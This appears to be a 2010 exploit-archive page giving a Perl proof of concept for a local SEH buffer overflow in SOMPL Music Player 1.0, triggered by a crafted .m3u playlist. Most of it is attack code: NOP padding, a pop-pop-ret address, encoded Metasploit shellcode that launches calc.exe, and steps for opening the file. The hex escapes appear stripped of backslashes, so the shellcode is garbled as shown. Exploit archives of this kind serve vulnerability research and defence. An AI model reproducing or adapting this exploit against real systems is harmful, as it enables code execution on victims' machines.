SOMPL Music Player v1.0 (.m3u) Local Buffer Overflow (SEH)
Posted on 18 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>SOMPL Music Player v1.0 (.m3u) Local Buffer Overflow (SEH)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================== SOMPL Music Player v1.0 (.m3u) Local Buffer Overflow (SEH) ========================================================== # Exploit Title: SOMPL Music Player v1.0 (.m3u) Local Buffer Overflow (SEH) # Date: August 18, 2010 # Author: CG Tan # Software Link: http://sourceforge.net/projects/somplmp3/ # Version: 1.0 # Tested on: Windows XP SP2 En, Windows XP SP3 En # CVE : N/A #!/usr/bin/perl open FILE, ">exploit.m3u"; print FILE "x90" x 4148; print FILE "x90x90xebx04"; print FILE "x8fx11x50x32";#pop pop ret @ S.O.M.PLcc3250mt.dll # win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com #exclusions: 0x00 0x0a 0x0d 0x61 0x62 0x63 0x64 0x65 0x66 0x67 0x68 0x69 0x6a 0x6b 0x6c 0x6d 0x6e 0x6f 0x70 0x71 0x72 0x73 0x74 0x75 0x76 0x77 0x78 0x79 0x7a my $shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49". "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36". "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34". "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41". "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44". "x42x30x42x50x42x30x4bx58x45x34x4ex33x4bx58x4ex47". "x45x50x4ax47x41x50x4fx4ex4bx48x4fx34x4ax41x4bx58". "x4fx35x42x42x41x30x4bx4ex49x34x4bx58x46x33x4bx38". "x41x30x50x4ex41x53x42x4cx49x49x4ex4ax46x38x42x4c". "x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e". "x46x4fx4bx53x46x45x46x32x46x50x45x37x45x4ex4bx38". "x4fx35x46x42x41x50x4bx4ex48x56x4bx38x4ex30x4bx44". "x4bx48x4fx55x4ex51x41x30x4bx4ex4bx58x4ex31x4bx58". "x41x30x4bx4ex49x38x4ex45x46x42x46x50x43x4cx41x43". "x42x4cx46x36x4bx48x42x44x42x53x45x58x42x4cx4ax57". "x4ex50x4bx38x42x44x4ex30x4bx48x42x37x4ex41x4dx4a". "x4bx58x4ax56x4ax50x4bx4ex49x30x4bx38x42x58x42x4b". "x42x50x42x50x42x50x4bx38x4ax46x4ex33x4fx35x41x53". "x48x4fx42x56x48x45x49x38x4ax4fx43x38x42x4cx4bx37". "x42x55x4ax36x42x4fx4cx48x46x30x4fx45x4ax36x4ax39". "x50x4fx4cx58x50x50x47x35x4fx4fx47x4ex43x56x41x56". "x4ex46x43x46x50x42x45x56x4ax37x45x56x42x50x5a"; print FILE $shellcode; close FILE; #open SOMPL music player and click on the "LL" button to open the playlist exploit.m3u # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>